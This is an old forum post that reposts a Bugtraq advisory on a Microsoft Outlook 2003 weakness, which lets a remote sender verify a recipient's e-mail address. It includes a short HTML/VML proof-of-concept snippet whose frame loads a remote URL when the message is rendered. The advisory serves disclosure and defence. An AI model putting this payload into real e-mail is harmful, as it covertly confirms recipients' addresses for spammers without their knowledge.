mortello
Jun 8 2004, 03:26 PM
Microsoft Outlook Mail Client E-mail Address Verification Weakness
| CODE |
bugtraq id 10323
object
class Design Error
cve CVE-MAP-NOMATCH
remote Yes
local No
published May 11, 2004
updated Jun 04, 2004
vulnerable Microsoft Outlook 2003
not vulnerable
It has been reported that Microsoft Outlook mail client may be prone to a weakness that could allow a remote attacker to verify the validity of a recipient's e-mail address. This issue may result in a victim receiving more junk e-mail.
Microsoft Outlook 2003 is reported to be affected by this issue.
No exploit is required.
The following proof of concept has been provided:
<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION:
relative; TOP: 30px; HEIGHT: 200px"
src = "http://www.example.com/duh.txt#malware"></v:vmlframe>
<HTML>
<HEAD>
<STYLE>
v\:* { behavior: url(#default#VML); }
</STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD>
No solution at the moment... |
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
